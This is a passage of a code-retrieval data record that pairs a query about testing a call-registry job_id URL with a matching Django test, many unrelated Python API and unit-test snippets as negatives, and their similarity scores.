last_seen=two_weeks_ago,\n app=self.android_app,\n )\n call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def start_job(\n self,\n *,\n id: str,\n error_trace: t.Optional[bool] = None,\n filter_path: t.Optional[\n t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]\n ] = None,\n human: t.Optional[bool] = None,\n pretty: t.Optional[bool] = None,\n ) -> ObjectApiResponse[t.Any]:\n if id in SKIP_IN_PATH:\n raise ValueError(\"Empty value passed for parameter 'id'\")\n __path = f\"/_rollup/job/{_quote(id)}/_start\"\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query[\"error_trace\"] = error_trace\n if filter_path is not None:\n __query[\"filter_path\"] = filter_path\n if human is not None:\n __query[\"human\"] = human\n if pretty is not None:\n __query[\"pretty\"] = pretty\n __headers = {\"accept\": \"application/json\"}\n return self.perform_request( # type: ignore[return-value]\n \"POST\", __path, params=__query, headers=__headers\n )", "def test_start(self):\n\n message = {\"method\": \"start\",\n \"params\": {\"elem\": self.container_to_run}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"start\")\n self.assertIsInstance(response[\"result\"], list)\n\n container_name = \"/\" + self.container_to_run\n\n containers = {i[0]: i[1] for i in response[\"result\"]}\n self.assertIn(container_name, containers.keys(),\n \"Container not found\")\n\n find_up_status = containers[container_name].lower().find(\"up\")\n\n self.assertEqual(find_up_status, 0, \"Container is not running\")", "async def test_fn_create(app: Quart) -> None:\n test_client = app.test_client()\n response = await test_client.post(\n \"/fn\", json=VALID_TASK_BASIC\n )\n assert response.status_code == 200\n response_json = await response.get_json()\n assert response_json == VALID_TASK_BASIC", "def test_start(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n response = requests.get(url)\n\n assert response.status_code == 200\n assert response.headers[\"content-type\"] == \"text/html; charset=utf-8\"\n\n assert len(response.text) > 0", "def test_POST_fetcher():\n params = {\n 'key1':'value1',\n 'arg2':'value2'\n }\n data = {\n 'data1':'value1',\n 'data2':'morevalues'\n }\n\n ## test that request goes ok\n resp = wf_utils.fetch_POST_request(\n POST_ECHO_ENDPOINT,\n data,\n params=params\n )\n\n ## test that response can be parsed\n payload = resp.json()\n\n ## test that response contains expected echo\n assert payload['args'] == params\n assert payload['data'] == data\n assert payload['headers']['user-agent'] == wf_utils.USER_AGENT", "def test_create_job(self):\n engine = Engine(self.config_file, self.api_token)\n\n engine.create_job()\n\n assert engine.ingest_job_id == 23", "def test_successful(self):\n\n url = '/%s/job-types/running/' % self.api\n response = 
self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['job_type']['name'], self.job.job_type.name)\n self.assertEqual(result['results'][0]['count'], 1)\n self.assertIsNotNone(result['results'][0]['longest_running'])", "def set_start():\n app.logger.debug(\"Got a JSON set_start post\");\n global dateFormat\n reply = {}\n\n flask.session[\"bStart\"] = request.form[\"bStart\"]\n flask.session[\"bLength\"] = request.form[\"bLength\"]\n bLength = int(request.form[\"bLength\"])\n try:\n start = arrow.get(flask.session[\"bStart\"], \"YYYY/MM/DD HH:mm\")\n except:\n reply[\"message\"] = \"Bad date Time.\"\n return jsonify(result=reply)\n \n brevet = AcpBrevet(bLength, start)\n open_limit = brevet.calc_open(0,bLength)\n close_limit = brevet.calc_close(0,bLength)\n\n reply[\"message\"] = \"Start of event and length set.\"\n reply[\"open\"] = open_limit.format(dateFormat)\n reply[\"close\"] = close_limit.format(dateFormat)\n return jsonify(result=reply)", "def test_xqueue_callback_success(self):\r\n fake_key = 'fake key'\r\n xqueue_header = json.dumps({'lms_key': fake_key})\r\n data = {\r\n 'xqueue_header': xqueue_header,\r\n 'xqueue_body': 'hello world',\r\n }\r\n\r\n # Patch getmodule to return our mock module\r\n with patch('courseware.module_render.find_target_student_module') as get_fake_module:\r\n get_fake_module.return_value = self.mock_module\r\n # call xqueue_callback with our mocked information\r\n request = self.request_factory.post(self.callback_url, data)\r\n render.xqueue_callback(request, self.course_key, self.mock_user.id, self.mock_module.id, self.dispatch)\r\n\r\n # Verify that handle ajax is called with the correct data\r\n request.POST['queuekey'] = fake_key\r\n self.mock_module.handle_ajax.assert_called_once_with(self.dispatch, request.POST)", "def request_training():\n log = logger.new()\n request_content = flask.request.get_json()\n if request_content is None:\n log.error('frontend::train_request::invalid_json')\n flask.abort(415)\n\n training_request = extract_training_request(request_content)\n if training_request is None:\n log.error('frontend::train_request::invalid_request')\n flask.abort(400)\n\n job_id = _database_operations.create_new_job(training_request, Session())\n log.info('frontend::train_request::request_training', job_id=job_id)\n return job_id", "def test():\n request = pb2.TestRequest.FromString(flask.request.get_data())\n logger.debug(\"Flask service received: %s\", request)\n\n if not request.service_hops:\n response = pb2.TestResponse(\n id=request.id,\n status=[pb2.CommonResponseStatus(\n status=pb2.SUCCESS,\n )],\n )\n else:\n status = ([pb2.CommonResponseStatus(status=pb2.SUCCESS)] +\n list(service.call_next(request).status))\n response = pb2.TestResponse(id=request.id, status=status)\n\n tracer = execution_context.get_opencensus_tracer()\n tracer.add_attribute_to_current_span(\"reqId\", request.id)\n return response.SerializeToString()", "def test_start_refresh(api: API, account: Account):\n api.candlepin.refresh.return_value = {\"id\": 123456} # type: ignore\n account.start_refresh()\n api.candlepin.refresh.assert_called_once() # type: ignore\n assert account._latest_refresh_job_id == 123456", "def test_fax_inbound_automation_post(self):\n pass", "def test_get_submission(self):\n # creating a submission\n sub_register = register_ok_submission(self, self.token)\n 
response_data = json.loads(sub_register.data.decode())\n self.assertTrue(response_data['status']=='success')\n\n # getting it from the service\n get_response = get_submissions(self, self.token)\n response_data = json.loads(get_response.data.decode())\n self.assertTrue(response_data['data'][0]['text_count']==2)\n self.assertTrue(isinstance(response_data['data'][0]['texts'], list))", "def test_request_spartan_grasp(self, *args, **kwargs):\n self.taskRunner.callOnThread(self.request_spartan_grasp, *args, **kwargs)", "def test_create_task_empty_request_body_success(\n self,\n mock_background_tasks,\n ):\n rv = TEST_CLIENT.post(TASK_ROUTE, json={})\n self.assertEqual(rv.status_code, 200)", "def test_adding_a_batch(created_job, bulk_request):\n bulk_request.reset_mock()\n bulk_request.return_value = '''<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <batchInfo xmlns=\"http://www.force.com/2009/06/asyncapi/dataload\">\n <id>BATCHONE</id>\n <jobId>THEJOBID</jobId>\n <state>Queued</state>\n </batchInfo>\n '''\n\n fake_data = [('1', '2'), ('3', '4')]\n created_job.add_batch(['Id', 'Name'], iter(fake_data))\n\n assert created_job.pending_batches == ['BATCHONE']\n\n bulk_request.assert_called_once_with(\n 'post',\n 'https://salesforce/services/async/34.0/job/THEJOBID/batch',\n content_type='text/csv; charset=UTF-8',\n data=mock.ANY\n )\n\n data = bulk_request.call_args[1]['data']\n assert b''.join(data) == b'Id,Name\\r\\n1,2\\r\\n3,4\\r\\n'", "def test_run_started(self):", "def test_api_get(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('GET', url, status=200, body=b'some xml and stuff')\n response = new_job.request('get', url, expected_response=200)\n assert response == b'some xml and stuff'", "def setUp(self):\n response = self.client.post('/trainer/create/',\n {\"name\": \"Blue\",\n \"las_name\": \"Oak\"})\n self.trainer_id = response.json()[\"id\"]", "def testCreateStartedPeriodic(self, mock_time): # pylint: disable=no-self-use\n mock_time.return_value = 1000\n gcs_client = mock.MagicMock(spec=storage.Client)\n blob = prow.create_started(gcs_client, \"gs://bucket/output\", \"abcd\")\n\n expected = {\n \"timestamp\": 1000,\n \"repos\": {\n \"kubeflow/tf-operator\": \"abcd\",\n },\n }\n blob.upload_from_string.assert_called_once_with(json.dumps(expected))", "def test_cron(mock_post, test_operator, header_fx):\n test_operator.cron()\n mock_post.assert_called_with(\"https://habitica.com/api/v3/cron\",\n headers=header_fx)", "async def test_post_400():\n work_queue = asyncio.Queue()\n await work_queue.put(TestData.JOB_TEMPLATE_POST_PAYLOAD)\n worker = tower_api_worker.TowerApiWorker(TestData.config, None, work_queue)\n with aioresponses() as mocked:\n mocked.post(\n TestData.JOB_TEMPLATE_POST_URL, status=400, body=\"BAD DATA\",\n )\n with pytest.raises(Exception) as excinfo:\n await worker.start()\n assert \"BAD DATA\" in str(excinfo.value)", "def start(self):\n self._client.predict(\n endpoint=self._endpoint, instances=self._request)\n\n if self._completion_callback:\n if self._query_handle:\n callback_args = [self._query_handle]\n else:\n callback_args = []\n self._completion_callback(*callback_args)", "def start():\n\tdata = bottle.request.json\n\t(\"START:\", json.dumps(data))\n\n\tresponse = {\"color\": \"#4F1851\", \"headType\": \"evil\", \"tailType\": \"hook\"}\n\treturn HTTPResponse(\n\t\tstatus=200,\n\t\theaders={\"Content-Type\": \"application/json\"},\n\t\tbody=json.dumps(response),\n\t)", "def start_flow():\n if request.method == 
'GET':\n tel = request.args.get('tel')\n flow = request.args.get('flow')\n to_rp = request.args.get('to')\n if to_rp == \"io\":\n client = io_client\n elif to_rp == \"datos\":\n client = mx_client\n else:\n return jsonify({}), 404\n contact = client.get_contacts(urn=['tel:+52' + tel]).all()\n if contact:\n client.create_flow_start(\n flow=flow,\n contacts=[contact[0].uuid],\n )\n return jsonify({\"Inicio_flow\": \"Si\"}), 201\n return jsonify({\"Inicio_flow\": \"No\"}), 404", "def create_call_ticket(data):\n firebase_uid = data['session'].split('/')[-1]\n contexts = data['queryResult']['outputContexts']\n for i in contexts:\n if 'call_data' in i['name']:\n context = i\n break\n\n date = datetime.datetime.now()\n date = date.strftime(\"%d-%m-%Y\")\n\n raw_params = context['parameters']\n\n free_time = {\n \"Time\": raw_params[\"free_time\"][\"time\"],\n \"Date\": raw_params[\"free_date\"][\"date\"]\n }\n ticket_params = {\n \"Agent\": \"None\",\n \"Product Type\": raw_params[\"product_type\"],\n \"Type\": \"Phone Call\",\n \"Issue Type\": raw_params[\"issue_type\"],\n \"Model Number\": raw_params[\"model_number\"],\n \"Serial Number\": raw_params[\"serial_number\"],\n \"Description\": \"0\",\n \"Status\": \"Open\",\n \"Date\": date,\n \"Time Slot Chosen\": \"0\",\n \"Time Slots\": {\"Slot 1\": {\"Time\": \"0\", \"Date\": \"0\"},\n \"Slot 2\": {\"Time\": \"0\", \"Date\": \"0\"},\n \"Slot 3\": {\"Time\": \"0\", \"Date\": \"0\"}},\n \"Progress\": \"Under Review\",\n \"Free Time\": free_time,\n \"Details of Call\": {\n \"Time\": \"0\",\n \"Date\": \"0\"}\n }\n\n ticket_id = str(uuid.uuid4())[:8]\n pprint.pprint(ticket_params)\n db = firebase.database()\n db.child(\n 'user_data').child(\n firebase_uid).child(\n 'Complaints').child(ticket_id).set(ticket_params)\n\n fulfillment_response = {\n \"fulfillmentText\":\n \"You appointment was successfully registered. The reference number for this ticket is \" + ticket_id +\n \". The timings of your call would be confirmed soon. 
You check the status by asking me or by going to the \"\n \"\\\"Tickets\\\" section of the app.\"}\n return fulfillment_response", "def test_jobs_successful(self):\n\n workspace = storage_test_utils.create_workspace()\n file1 = storage_test_utils.create_file()\n data_dict = {\n 'version': '1.0',\n 'input_data': [{\n 'name': 'INPUT_IMAGE',\n 'file_id': file1.id\n }],\n 'output_data': [{\n 'name': 'output_file_pngs',\n 'workspace_id': workspace.id\n }]}\n\n secret_configuration = {\n 'version': '6',\n 'priority': 50,\n 'output_workspaces': {'default': storage_test_utils.create_workspace().name},\n 'settings': {\n 'DB_HOST': 'som.host.name',\n 'DB_PASS': 'secret_password'\n }\n }\n\n seed_job_type = job_test_utils.create_seed_job_type(configuration=secret_configuration)\n seed_job = job_test_utils.create_job(job_type=seed_job_type, status='RUNNING', input=data_dict)\n\n url = '/%s/jobs/%d/' % (self.api, seed_job.id)\n response = self.client.generic('GET', url)\n result = json.loads(response.content)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n self.assertEqual(result['configuration']['priority'],50)\n self.assertNotIn('DB_PASS', result['configuration']['settings'])", "async def test_api_call_service_no_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\"\"\"\n test_value.append(1)\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n await mock_api_client.post(\"/api/services/test_domain/test_service\")\n await hass.async_block_till_done()\n assert len(test_value) == 1", "def test_run(self) -> None:\n startDate = dt.datetime.now() - dt.timedelta(days=1)\n endDate = startDate\n\n rawFreqCreator = RawFrequencyCreationHandler(\n self.appConfig['rawFrequencyCreationServiceUrl'])\n resp = rawFreqCreator.createRawFrequency(startDate, endDate)\n self.assertTrue(resp['isSuccess'])\n self.assertTrue(resp['status'] == 200)\n self.assertTrue('message' in resp)", "async def test_setup_post(hass: HomeAssistant) -> None:\n respx.post(\"http://localhost\").respond(\n status_code=HTTPStatus.OK, json={\"key\": \"123\"}\n )\n assert await async_setup_component(\n hass,\n SENSOR_DOMAIN,\n {\n SENSOR_DOMAIN: {\n \"platform\": DOMAIN,\n \"resource\": \"http://localhost\",\n \"method\": \"POST\",\n \"value_template\": \"{{ value_json.key }}\",\n \"payload\": '{ \"device\": \"toaster\"}',\n \"name\": \"foo\",\n \"unit_of_measurement\": UnitOfInformation.MEGABYTES,\n \"verify_ssl\": \"true\",\n \"timeout\": 30,\n \"authentication\": \"basic\",\n \"username\": \"my username\",\n \"password\": \"my password\",\n \"headers\": {\"Accept\": CONTENT_TYPE_JSON},\n }\n },\n )\n await hass.async_block_till_done()\n assert len(hass.states.async_all(SENSOR_DOMAIN)) == 1", "def setUp(self):\n self.client = APIClient()\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.pk],\n 'days_in_hospital': 2,\n 'days_in_destination': 2,\n 'duration_minutes': 120,\n 'overview': '<strong>Bla</strong> bla bla',\n }", "def test_add_seed_job_type(self):\n\n url = '/%s/job-types/' % self.api\n manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST)\n manifest['job']['name'] = 'my-new-job'\n\n json_data = {\n 'icon_code': 'BEEF',\n 'is_published': True,\n 'docker_image': 'my-new-job-1.0.0-seed:1.0.0',\n 'manifest': manifest,\n 
'configuration': self.configuration\n }\n\n good_setting = {\n 'DB_HOST': 'scale'\n }\n\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n self.assertTrue('/%s/job-types/my-new-job/1.0.0/' % self.api in response['location'])\n\n job_type = JobType.objects.filter(name='my-new-job').first()\n\n results = json.loads(response.content)\n self.assertEqual(results['id'], job_type.id)\n self.assertEqual(results['version'], job_type.version)\n self.assertEqual(results['title'], job_type.get_title())\n self.assertEqual(results['revision_num'], job_type.revision_num)\n self.assertEqual(results['revision_num'], 1)\n self.assertIsNone(results['max_scheduled'])\n self.assertEqual(results['configuration']['settings'], good_setting)", "def request_start(self, req):\n log.info(\"Received start request\")\n if not self._configured:\n msg = \"FITS interface server is not configured\"\n log.error(msg)\n return (\"fail\", msg)\n try:\n fw_socket = self._fw_connection_manager.get_transmit_socket()\n except Exception as error:\n log.exception(str(error))\n return (\"fail\", str(error))\n log.info(\"Starting FITS interface capture\")\n self._stop_capture()\n buffer_size = 4 * (self.nchannels + 2)\n handler = R2SpectrometerHandler(2, self.nchannels,\n self.integration_time,\n self.nblank_phases,\n fw_socket)\n self._capture_thread = CaptureData(self._capture_interface,\n self._capture_port,\n buffer_size,\n handler)\n self._capture_thread.start()\n return (\"ok\",)", "def run_post(payload, response):\n message = FakeMessage()\n message.raw_payload = payload\n response_queue = queue.Queue()\n headers = {\"Content-Type\": \"application/json\"}\n with aioresponses() as mocked:\n mocked.post(\n TestData.JOB_TEMPLATE_POST_URL,\n status=200,\n body=json.dumps(response),\n headers=headers,\n )\n worker.execute(message, TestData.RECEPTOR_CONFIG, response_queue)\n\n return response_queue", "def test_start_already_running(self, mock_add_job, mock_get_job):\n mock_get_job.return_value = MagicMock()\n\n result = self.aggregator.start(self.node_id)\n\n self.assertFalse(result)\n self.assertFalse(mock_add_job.called)", "async def test_create_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_get_one_flow_requests_as_super_client(self):\n headers = self._get_oauth_header(client_name=DISPATCHER_NAME)\n res = self.client.get('/v1/flow_requests/p_11111/', **headers)\n self.assertEqual(res.status_code, 200)\n profile = {\n 'code': 'PROF_001',\n 'version': 'v0',\n 'payload': '[{\"clinical_domain\": \"Laboratory\"}]'\n }\n expected = {\n 'flow_id': 'f_11111',\n 'process_id': 'p_11111',\n 'status': 'PE',\n 'profile': profile,\n 'sources': [{\n 'source_id': SOURCE_1_ID,\n 'name': SOURCE_1_NAME,\n 'profile': profile\n }],\n 'start_validity': '2017-10-23T10:00:00+02:00',\n 'expire_validity': '2018-10-23T10:00:00+02:00'\n }\n self.assertDictEqual(res.json(), expected)", "async def test_api_fire_event_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n 
@ha.callback\n def listener(event):\n \"\"\"Record that our event got called.\n\n Also test if our data came through.\n \"\"\"\n if \"test\" in event.data:\n test_value.append(1)\n\n hass.bus.async_listen_once(\"test_event_with_data\", listener)\n\n await mock_api_client.post(\"/api/events/test_event_with_data\", json={\"test\": 1})\n\n await hass.async_block_till_done()\n\n assert len(test_value) == 1", "def test_start_process(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # get patches\n mocked_start = self.supervisor.supvisors.starter.start_process\n mocked_progress = self.supervisor.supvisors.starter.in_progress\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # patch the instance\n rpc._get_application_process = Mock()\n # test RPC call with unknown strategy\n with self.assertRaises(RPCError) as exc:\n rpc.start_process('strategy', 'appli:proc')\n self.assertEqual(Faults.BAD_STRATEGY, exc.exception.code)\n self.assertEqual('BAD_STRATEGY: strategy', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running process\n rpc._get_application_process.return_value = (\n None, Mock(**{'running.return_value': True,\n 'namespec.return_value': 'proc1'}))\n with self.assertRaises(RPCError) as exc:\n rpc.start_process(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: proc1', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running processes\n rpc._get_application_process.return_value = (\n Mock(**{'processes.values.return_value': [\n Mock(**{'running.return_value': False}),\n Mock(**{'running.return_value': True,\n 'namespec.return_value': 'proc2'})]}), None)\n with self.assertRaises(RPCError) as exc:\n rpc.start_process(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: proc2', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with stopped processes\n proc_1 = Mock(**{'running.return_value': False,\n 'stopped.return_value': True,\n 'namespec.return_value': 'proc1'})\n proc_2 = Mock(**{'running.return_value': False,\n 'stopped.return_value': False,\n 'namespec.return_value': 'proc2'})\n rpc._get_application_process.return_value = (\n Mock(**{'processes.values.return_value': [\n proc_1, proc_2]}), None)\n # test RPC call with no wait and not done\n mocked_start.return_value = False\n result = rpc.start_process(1, 'appli:*', 'argument list', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(1, proc_1, 'argument list'),\n call(1, proc_2, 'argument list')], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call no wait and done\n mocked_start.return_value = True\n result = rpc.start_process(1, 'appli:*', 'argument list', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(1, proc_1, 'argument 
list'),\n call(1, proc_2, 'argument list')], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call with wait and done\n result = rpc.start_process(2, 'appli:*', wait=True)\n self.assertTrue(result)\n self.assertEqual([call(2, proc_1, ''), call(2, proc_2, '')],\n mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call with wait and not done\n mocked_start.return_value = False\n deferred = rpc.start_process(2, 'appli:*', wait=True)\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(2, proc_1, ''), call(2, proc_2, '')],\n mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n # test returned function: return True when job in progress\n mocked_progress.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: raise exception if job not in progress anymore\n # and process still stopped\n mocked_progress.return_value = False\n with self.assertRaises(RPCError) as exc:\n deferred()\n self.assertEqual(Faults.ABNORMAL_TERMINATION, exc.exception.code)\n self.assertEqual('ABNORMAL_TERMINATION: proc1', exc.exception.text)\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: return True if job not in progress anymore\n # and process running\n proc_1.stopped.return_value = False\n self.assertTrue(deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)", "def TestCaseWillStart(self, request, context):\n LOGGER.info('Received request for TestCaseWillStart %s', request)\n for plugin in self.plugins:\n plugin.test_case_will_start(request)\n return test_plugin_service_pb2.TestCaseWillStartResponse()", "def test_success(self, data_flow_api_client, contact_factory):\n contact = contact_factory()\n response = data_flow_api_client.get(self.view_url)\n assert response.status_code == status.HTTP_200_OK\n response_results = response.json()['results']\n assert len(response_results) == 1\n result = response_results[0]\n expected_result = get_expected_data_from_contact(contact)\n assert result == expected_result", "def test_batch(self):\n batch = batch_test_utils.create_batch()\n self.job1.batch_id = batch.id\n self.job1.save()\n\n url = '/%s/jobs/?batch_id=%d' % (self.api, batch.id)\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['id'], self.job1.id)", "def call_init(mac_address, ip_address, start_port, free_ports):\n url = INIT_URL\n init_dict = {'IPAddress': ip_address, 'MacAddress': mac_address, 'OpenPorts': free_ports, 'StartPort': start_port}\n logging.info(\"Calling coordinator at url: %s, with dict: %s\", url, str(init_dict))\n try:\n resp = requests.post(url, json=init_dict, timeout=10)\n except requests.exceptions.RequestException as e:\n return None, e\n return resp, None", "def test_create(self, client, job, agent_token):\n stage_url = '{base}/stages/teststage'.format(base=job_url_for(job))\n response = client.put(\n stage_url,\n headers={'x_dockci_api_key': 
agent_token},\n data={'success': 'true'},\n )\n\n assert response.status_code == 200 # TODO 201\n\n response_data = json.loads(response.data.decode())\n assert response_data.pop('success') == True\n\n response = client.get(stage_url)\n response_data = json.loads(response.data.decode())\n assert response_data.pop('success') == True" ]
[ "0.80795336", "0.7127848", "0.70870763", "0.70252454", "0.690225", "0.682077", "0.6728949", "0.64632064", "0.61601955", "0.61388147", "0.6122343", "0.61069036", "0.598875", "0.5923191", "0.5838878", "0.5811853", "0.581069", "0.5795599", "0.5779675", "0.5745532", "0.5728147", "0.56856054", "0.5582621", "0.55753636", "0.5550645", "0.5547853", "0.5522678", "0.5479358", "0.54533166", "0.54498565", "0.54230976", "0.5407813", "0.53979623", "0.5366026", "0.5354841", "0.53508025", "0.5342026", "0.53418946", "0.5330491", "0.5299709", "0.5296479", "0.52537686", "0.52534497", "0.52500015", "0.524651", "0.5238322", "0.52335644", "0.5233009", "0.5224867", "0.52202505", "0.52192134", "0.52169645", "0.5216273", "0.52086025", "0.520387", "0.51944745", "0.5194037", "0.5160752", "0.51502174", "0.5148969", "0.5147824", "0.5141284", "0.51406324", "0.51400423", "0.513831", "0.511265", "0.511024", "0.5106004", "0.50917023", "0.50888795", "0.50863963", "0.508425", "0.50786775", "0.5060322", "0.5055971", "0.50526893", "0.50522816", "0.5049597", "0.5046774", "0.5030588", "0.5022567", "0.5022117", "0.50215995", "0.50192434", "0.5017053", "0.5014981", "0.5011428", "0.50083375", "0.49975094", "0.4990421", "0.49884924", "0.498584", "0.49840343", "0.49780312", "0.49775067", "0.49761584", "0.49746963", "0.49739218", "0.49700323", "0.4961983" ]
0.8062351
1
Test the job_id URL returned by a start call registry POST. The test uses the start_call_fx fixture
def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx): url = reverse_lazy('calls:registry-list') response = client.post(url, start_call_fx, content_type='application/json') response_data = response.json() task_url = response_data.get('job_id', None) task_response = client.get(task_url) assert task_response.status_code == status.HTTP_200_OK
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def start_test(self, request):\n request.worker.start_test(request.message.test_id)\n\n return SuccessReply()", "def test_start_post(self):\n response = self.client.open('/start',\n method='POST')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_submit_job(self):\n body = '\\\"{train: \\\\\\\"http:/github.com/path/file1\\\\\\\", seed:5, epochs: 5000}\\\"'\n response = self.client.open(\n '/tx-queue/2/scheduler/job',\n method='POST',\n data=json.dumps(body),\n 
